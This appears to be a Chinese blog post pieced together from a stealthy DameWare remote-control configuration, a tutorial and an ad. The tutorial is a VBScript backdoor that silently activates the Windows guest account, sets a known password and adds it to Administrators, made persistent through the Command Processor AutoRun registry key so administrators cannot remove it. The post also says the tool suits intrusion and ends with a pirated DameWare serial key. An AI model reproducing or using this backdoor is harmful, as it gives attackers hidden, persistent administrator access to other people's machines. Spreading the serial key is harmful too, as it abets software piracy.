[Settings]
Port=6129
Adgang NTLM=Yes
Adgang 1=
Adgang 2=
Adgang 3=0
Notify On New Connection=No
Permission Required=No
Show SysTray Icon=No
Permission Required for non Admin=Yes
On Disconnect Logoff Desktop=No
Force Applications Close=No
On Disconnect Lock Workstation=No
Logon At Logon Desktop Only=No
Enable Add Client Connection Menu=Yes
Enable Disconnection Menu=Yes
先新建一个.txt文档
然后加入下面的内容
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0 (激活guest账号)
wsh.run "net user guest djhacker",0 (修改GUEST密码为djhacker)
wsh.run "net localgroup administrators guest /add",0 (添加GUEST到管理组)
然后把这个.txt文件的扩展名改为 .vbs即可
然后打开注册表修改注册标里面的:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
在键值里面加入你vbs文件的路径就OK,然后运行vbs文件,不死账号出来拉
如果管理员把你动过手脚的guest账号停了,当时他运行cmd的时候又自动启动了guest账号,因为上面的修改已经让我们的vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里面的路径运行那VBS文件
原理:很简单的原理,其实有基础的朋友看上面的过程就已经知道了原理了~~~
通过修改注册表和使用vbs文件里面的一些代码让 CMD和你指定路径的vbs文件产生了关联,接着运行CMD直接通过注册标里面的路径运行你的指定的文件,嘎嘎~~~简单吧
这样一个不死的就建立了`
可能有的朋友要产生疑问~为什么不自己建立账号,如果你自己建立的话被管理员发现了就删掉了~~GUEST是删不掉的,系统内置账号,哈哈哈
(DameWare NT Utilities是一套功能强大的Windows NT 远程控制软件。试用后觉得是网管的好帮手,功能超强呀!有了它网管就不用再为了设置调试在两台机器中跑来跑去了。呵呵!但你想用他来入侵远程主机的话,那就更没问题了,你只要拥有一个远程主机的有权限的帐号,就能使用它远程GUI下登陆交互控制主机。
Name:crsky
Company:www.crsky.com
Code:B6351826C3A74E-5422D5612E425F422
来源:https://www.cnblogs.com/goovc/archive/2004/08/21/35463.html